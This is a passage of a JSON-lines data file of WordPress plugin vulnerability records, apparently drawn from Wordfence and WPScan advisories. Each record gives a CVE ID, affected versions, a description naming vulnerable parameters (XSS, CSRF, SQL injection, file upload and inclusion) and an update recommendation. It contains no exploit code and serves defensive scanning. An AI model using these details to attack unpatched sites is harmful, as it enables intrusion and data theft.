version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-ninja\\\/trunk\\\/modules\\\/core-scanner\\\/core-scanner.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333048\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3333048\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ee45f8-9978-48ec-8f87-229dc82938a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ee45f8-9978-48ec-8f87-229dc82938a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13351","slug":"social-testimonials-and-reviews-widget","versionImpact":"5.20","versionEndExcluding":"5.21","description":"The Social proof testimonials and reviews by Repuso plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rw_image_badge1' shortcode in all versions up to, and including, 5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222107\\\/social-testimonials-and-reviews-widget\\\/trunk\\\/social-testimonials-and-reviews-widget.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222107\\\/social-testimonials-and-reviews-widget\\\/trunk\\\/social-testimonials-and-reviews-widget.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff7ead53-4b20-48ba-95cd-118fb4eab330?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff7ead53-4b20-48ba-95cd-118fb4eab330?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8725","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"Multiple plugins and\/or themes for WordPress are vulnerable to Limited File Upload in various versions. This is due to a lack of proper checks to ensure lower-privileged roles cannot upload .css and .js files to arbitrary directories. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an administrator, to upload .css and .js files to any directory within the WordPress root directory, which could lead to Stored Cross-Site Scripting. The Advanced File Manager Shortcodes plugin must be installed to exploit this vulnerability.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2b4f93-93a6-480f-a877-ca47bd133bb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce2b4f93-93a6-480f-a877-ca47bd133bb6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_shortcode.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_shortcode.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8704","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"The Advanced File Manager plugin for WordPress is vulnerable to Local JavaScript File Inclusion in all versions up to, and including, 5.2.8 via the 'fma_locale' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b783cc6-d79d-43ef-948a-a1953d383ca3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b783cc6-d79d-43ef-948a-a1953d383ca3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_main.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8126","slug":"file-manager-advanced","versionImpact":"5.2.8","versionEndExcluding":"5.2.9","description":"The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads via the 'class_fma_connector.php' file in all versions up to, and including, 5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload a new .htaccess file allowing them to subsequently upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/801d6cde-f9c6-4e68-8bfc-ff8c0593372d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/801d6cde-f9c6-4e68-8bfc-ff8c0593372d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3004748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php?rev=3004748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157713\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6724","slug":"magic-post-thumbnail","versionImpact":"5.2.7","versionEndExcluding":"5.2.8","description":"The Generate Images  WordPress plugin before 5.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 5.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cb3158a-263d-4c4a-8029-62b453c281cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cb3158a-263d-4c4a-8029-62b453c281cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3478","slug":"mwp-herd-effect","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The Herd Effects  WordPress plugin before 5.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting effects via CSRF attacks","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09f1a696-86ee-47cc-99de-57cfd2a3219d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/09f1a696-86ee-47cc-99de-57cfd2a3219d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10646","slug":"fluentform","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form's subject parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.2.4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/5.2.4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203147\\\/fluentform\\\/trunk\\\/boot\\\/globals.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203147\\\/fluentform\\\/trunk\\\/boot\\\/globals.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9548","slug":"wp-slimstat","versionImpact":"5.2.6","versionEndExcluding":"5.2.7","description":"The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the resource parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping when logging visitor requests. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa91912d-5794-4c96-8a13-bd54ce0f1deb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa91912d-5794-4c96-8a13-bd54ce0f1deb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\\\/admin\\\/view\\\/right-now.php#L196\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-slimstat\\\/tags\\\/5.2.6\\\/admin\\\/view\\\/right-now.php#L196\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13382","slug":"calculated-fields-form","versionImpact":"5.2.63","versionEndExcluding":"5.2.64","description":"The Calculated Fields Form WordPress plugin before 5.2.64 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/925de4af-fc71-45ae-8454-7e4f70be13ca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/925de4af-fc71-45ae-8454-7e4f70be13ca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12601","slug":"calculated-fields-form","versionImpact":"5.2.63","versionEndExcluding":"5.2.64","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 5.2.63. This is due to unlimited height and width parameters for CAPTCHA images. This makes it possible for unauthenticated attackers to send multiple requests with large values, resulting in slowing server resources if the server does not mitigate Denial of Service attacks.","recommendation":"Update to version 5.2.64, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/calculated-fields-form\\\/trunk\\\/captcha\\\/captcha.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207826\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207826\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eade2ed-9a75-4857-a2c5-a21e016e7029?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1eade2ed-9a75-4857-a2c5-a21e016e7029?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13381","slug":"calculated-fields-form","versionImpact":"5.2.61","versionEndExcluding":"5.2.62","description":"The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da099e52-7f7b-4d76-a0bc-a46315510e0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da099e52-7f7b-4d76-a0bc-a46315510e0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12273","slug":"calculated-fields-form","versionImpact":"5.2.61","versionEndExcluding":"5.2.62","description":"The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 5.2.62, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90333618-2be7-49cf-822a-819699f07977\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90333618-2be7-49cf-822a-819699f07977\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-5487","slug":"automatorwp","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The AutomatorWP \u2013 Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the field_conditions parameter in all versions up to, and including, 5.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Administrators can configure the plugin to allow access to this functionality to authors and higher.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatorwp\\\/tags\\\/5.2.3\\\/integrations\\\/automatorwp\\\/triggers\\\/all-posts.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatorwp\\\/tags\\\/5.2.3\\\/integrations\\\/automatorwp\\\/triggers\\\/all-posts.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3307465%40automatorwp%2Ftrunk&old=3302138%40automatorwp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3307465%40automatorwp%2Ftrunk&old=3302138%40automatorwp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1a84c6-e28b-42fe-a16a-aeb227cfe956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e1a84c6-e28b-42fe-a16a-aeb227cfe956?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13317","slug":"shipworks-e-commerce-bridge","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The ShipWorks Connector for Woocommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. This is due to missing or incorrect nonce validation on the 'shipworks-wordpress' page. This makes it possible for unauthenticated attackers to update the services username and password via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223835%40shipworks-e-commerce-bridge&new=3223835%40shipworks-e-commerce-bridge&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223835%40shipworks-e-commerce-bridge&new=3223835%40shipworks-e-commerce-bridge&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/503c00f5-59e5-4ca2-ac3d-a3f38a993f0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/503c00f5-59e5-4ca2-ac3d-a3f38a993f0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2711","slug":"ultimate-product-catalogue","versionEndExcluding":"5.2.6","description":"The Ultimate Product Catalog WordPress plugin before 5.2.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71c5b5b5-8694-4738-8e4b-8670a8d21c86\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71c5b5b5-8694-4738-8e4b-8670a8d21c86\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1037","slug":"all-in-one-wp-security-and-firewall","versionImpact":"5.2.5","versionEndExcluding":"5.2.6","description":"The All-In-One Security (AIOS) \u2013 Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-wp-security-and-firewall\\\/trunk\\\/admin\\\/wp-security-list-404.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032127\\\/all-in-one-wp-security-and-firewall\\\/tags\\\/5.2.6\\\/admin\\\/wp-security-list-404.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032127\\\/all-in-one-wp-security-and-firewall\\\/tags\\\/5.2.6\\\/admin\\\/wp-security-list-404.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5598","slug":"file-manager-advanced","versionImpact":"5.2.4","versionEndExcluding":"5.2.5","description":"The Advanced File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.2.4 via the 'fma_local_file_system' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.","recommendation":"Update to version 5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d4ff5ed-8857-46b8-942b-ac0f47880a95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d4ff5ed-8857-46b8-942b-ac0f47880a95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107587\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107587\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9940","slug":"calculated-fields-form","versionImpact":"5.2.45","versionEndExcluding":"5.2.46","description":"The Calculated Fields Form plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 5.2.45. This is due to the plugin not properly neutralizing HTML elements from submitted forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views form submissions in their email.","recommendation":"Update to version 5.2.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168950%40calculated-fields-form&new=3168950%40calculated-fields-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168950%40calculated-fields-form&new=3168950%40calculated-fields-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4318","slug":"mwp-herd-effect","versionEndExcluding":"5.2.4","description":"The Herd Effects WordPress plugin before 5.2.4 does not have CSRF when deleting its items, which could allow attackers to make logged in admins delete arbitrary effects via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b40030-3706-4063-bf59-4ec983afdbb6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93b40030-3706-4063-bf59-4ec983afdbb6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1809","slug":"wp-analytify","versionImpact":"5.2.3","versionEndExcluding":"5.2.4","description":"The Analytify \u2013 Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on AJAX functions in combination with nonce leakage in all versions up to, and including, 5.2.3. This makes it possible for authenticated attackers, with subscriber access and higher, to obtain certain sensitive information related to plugin settings.","recommendation":"Update to version 5.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a659071-df11-4318-86c2-7881163c8b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a659071-df11-4318-86c2-7881163c8b62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072410%40wp-analytify%2Ftrunk&old=3024819%40wp-analytify%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3072410%40wp-analytify%2Ftrunk&old=3024819%40wp-analytify%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1584","slug":"wp-analytify","versionImpact":"5.2.3","versionEndExcluding":"5.2.4","description":"The Analytify \u2013 Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wpa_check_authentication' function in all versions up to, and including, 5.2.1. This makes it possible for unauthenticated attackers to modify the site's Google Analytics tracking ID.","recommendation":"Update to version 5.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c399c6a-d5e4-4b88-a0a9-003233d5d59f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c399c6a-d5e4-4b88-a0a9-003233d5d59f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072410%40wp-analytify&new=3072410%40wp-analytify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072410%40wp-analytify&new=3072410%40wp-analytify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4067","slug":"bus-ticket-booking-with-seat-reservation","versionEndExcluding":"5.2.4","description":"The Bus Ticket Booking with Seat Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab_date' and 'tab_date_r' parameters in versions up to, and including, 5.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff2855cb-e4a8-4412-af24-4cee03ae2d43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff2855cb-e4a8-4412-af24-4cee03ae2d43?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2945247%40bus-ticket-booking-with-seat-reservation&new=2945247%40bus-ticket-booking-with-seat-reservation&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2945247%40bus-ticket-booking-with-seat-reservation&new=2945247%40bus-ticket-booking-with-seat-reservation&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
